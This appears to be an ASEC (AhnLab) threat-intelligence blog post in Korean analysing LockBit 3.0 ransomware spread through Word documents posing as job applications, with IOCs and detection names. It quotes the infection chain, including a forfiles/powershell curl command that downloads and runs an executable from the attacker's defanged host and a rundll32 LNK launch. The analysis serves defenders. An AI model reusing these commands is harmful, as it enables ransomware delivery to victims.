워드 문서를 통해 유포되는 LockBit 3.0 랜섬웨어

ASEC 분석팀은 9/23 공유한 <입사지원 위장 메일로 유포 중인 NSIS형태의 LockBit 3.0 랜섬웨어>가 워드 문서 형태로도 유포되는 것을 확인하였다. 정확한 유포 경로는 확인되지 않았으나, 유포 파일명으로 ‘임규민.docx’, ‘전채린.docx’ 등 사람 이름을 사용하는 것으로 보아 전과 유사하게 입사지원서를 위장하여 유포되었을 것으로 추정된다.

확인된 워드 문서 내부 word\_rels\settings.xml.rels 파일에 External 링크가 존재한다. 이로 인해 문서 파일 실행 시 hxxp://ppaauuaa11232[.]cc/dlx5rc.dotm에 접속하여 추가 dotm 파일을 다운로드한다.

그림 1. settings.xml.rels
그림 2. 워드 문서 실행 시 URL 접속 화면

문서 파일 내부에는 매크로 사용을 유도하는 이미지가 존재한다. 다운로드 된 dlx5rc.dotm에는 VBA 매크로가 포함되어 있어 사용자가 콘텐츠 사용 버튼 클릭 시 악성 매크로가 실행된다.

그림 3. 워드 문서 내부
그림 4. 문서 속성

dotm 파일에 존재하는 VBA 매크로 코드는 다음과 같다.

그림 5. 악성 VBA 매크로 코드

코드 내부 문자열들은 난독화 되어 있으며 CLSID(72C24DD5-D70A-438B-8A42-98424B88AFB8)를 사용하는 것이 특징이다. VBA 매크로 실행 시 C:\Users\Public\ 폴더에 skeml.lnk 파일을 생성한다. 해당 링크 파일의 TargetPath는 forfiles.exe이며, rundll32.exe를 통해 실행된다. 링크 파일을 실행하는 명령어는 다음과 같다.

  • rundll32 url.dll,OpenURL C:\Users\Public\skeml.lnk

링크 파일 실행 시 파워쉘 명령어를 통해 hxxp://ppaauuaa11232[.]cc/aaa.exe에서 추가 악성 파일을 다운로드하여 C:\Users\Public\156498415616651651984561561658456.exe로 저장 및 실행한다. LNK 파일을 통해 실행되는 명령어는 다음과 같다.

  • forfiles.exe /p c:\windows\system32 /m notepad.exe /c “”cmd /c powershell/W 01 curl hxxp://ppaauuaa11232.cc/aaa.exe -o C:\Users\Public\156498415616651651984561561658456.exe;C:\Users\Public\156498415616651651984561561658456.exe”
그림 6. RAPIT 프로세스 트리

현재 다운로드 되는 156498415616651651984561561658456.exe 파일은 NSIS형태의 LockBit 3.0 랜섬웨어로 아래 글과 동일한 유형의 악성코드이다.

그림 7. 랜섬웨어 감염 후 바탕 화면

최근 LockBit 랜섬웨어가 다양한 방식으로 유포되고 있어 사용자의 주의가 필요하다. 사용하는 응용 프로그램 및 V3를 최신 버전으로 업데이트하여 사용하고 출처를 알 수 없는 문서 파일 실행을 자제해야 한다.

[파일 진단]
Downloader/DOC.External
Downloader/XML.External
Downloader/LNK.Powershell
Ransomware/Win.LockBit

[행위 진단]
Malware/MDP.Download.M1197  
Execution/MDP.Powershell.M1201
Ransom/MDP.Decoy.M1171

[IOC 정보]
2d8b6275dee02ea4ed218ba2673b834e (docx)
97c07d03556ddcfc8ebfa462df546eb5 (docx)
45dfdde3df07b6ccc23b7ae6e3dc1212 (docx)
77c5fb080bf77f099c5b5f268dcf4435 (dotm)
738bee5280d512a238c3bb48c3278f63 (lnk)
7b74e4fb9a95f41d5d9b4a71a5fe40b9 (exe)
hxxp://ppaauuaa11232[.]cc/dlx5rc.dotm
hxxp://ppaauuaa11232[.]cc/aaa.exe

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

Categories:악성코드 정보

Tagged as:, ,

0 0 votes
별점 주기
guest
0 댓글
Inline Feedbacks
View all comments